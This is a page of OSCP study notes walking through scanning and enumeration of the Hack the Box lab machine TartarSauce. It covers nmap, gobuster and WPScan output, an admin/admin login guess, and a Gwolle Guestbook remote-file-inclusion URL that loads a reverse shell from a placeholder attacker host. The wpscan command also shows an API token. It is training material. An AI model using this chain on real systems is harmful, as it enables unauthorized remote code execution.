📗
OSCP Prep
  • OSCP Preperation
  • Hack the Box Linux
    • Bashed
    • Nibbles
    • Sense
    • Conceal
    • La Casa de Papel
    • Lightweight
    • Jerry
      • Scanning and Enumeration
    • Jarvis
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lesson's Learned
    • TartarSauce
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Poison
      • Turning LFI into RFI
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Node(Comeback to)
      • Scanning and Enumeration
      • Exploitation
    • SolidState
      • Scanning and Enumeration
      • Exploitation and POSTY
      • Lessons Learned
    • Nineveh
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons learned
    • Cronos
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • SwagShop
      • Scanning and Enumeration
      • Exploitation
      • Lessons Learned
    • Networked
      • Exploitation
    • FriendZoned
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons learned
    • Sunday
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Valentine
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Irked
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Kotarak
    • Nibbles
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
  • Hack the Box Windows
    • Bounty
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
    • Blue
      • Scanning and Enumeration
      • Lessons Learned
    • Granny
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Grandpa
      • Scanning and Enumeration
      • Exploitation
      • Lessons Learned
    • Arctic
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Optimum
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Devel
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
    • Legacy (comeback to )
      • Scanning and Enumeration
      • Exploitation
  • Slick Tricks
    • Banned by Bruteforce? Try this!
    • Hydra for Web Logins
    • Grepping
    • Redirecting all Script Traffic to Burp
    • Word Count
    • Reverse Shell Tricks
    • Transfering files
  • Nmap Help
  • Linux Guide
    • Linux Shortcuts
  • Privelege Escalation
    • Linux Privilege Escalation
Powered by GitBook
On this page
  • Scanning
  • Enumeration
  • Attempted password
  • WPScan

Was this helpful?

  1. Hack the Box Linux
  2. TartarSauce

Scanning and Enumeration

Scanning

kali@kali:~$ nmap -p 80 -sC -sV 10.10.10.88
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-29 09:25 EDT
Nmap scan report for 10.10.10.88
Host is up (0.083s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds

Enumeration

Attempted password

attempted password of admin/admin

Found wp directory 

kali@kali:~$ gobuster dir --url http://10.10.10.88/webservices --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.88/webservices
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/29 10:16:55 Starting gobuster
===============================================================
/wp (Status: 301)

WPScan 

wpscan --url http://10.10.10.88:80/webservices/wp -e ap --plugins-detection aggressive --api-token lR1w5xltvpE1IsseAMKxxrMm6gpfyfef1SRLaR7peAs

After conducting the scan, a found plugin was the gwolle-gb plugin.

Running a searchsploit we are able to find a Remote File Inclusion Vulnerability. 

kali@kali:~$ searchsploit gwolle
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion                 | php/webapps/38861.txt
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Further analyzation of the code looks like we need to create a reverse-shell and name it wp-load.php. After that we need to access it with the following link

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

Doing so should allow us to obtain a reverse shell.

PreviousTartarSauceNextExploitation

Last updated 4 years ago

Was this helpful?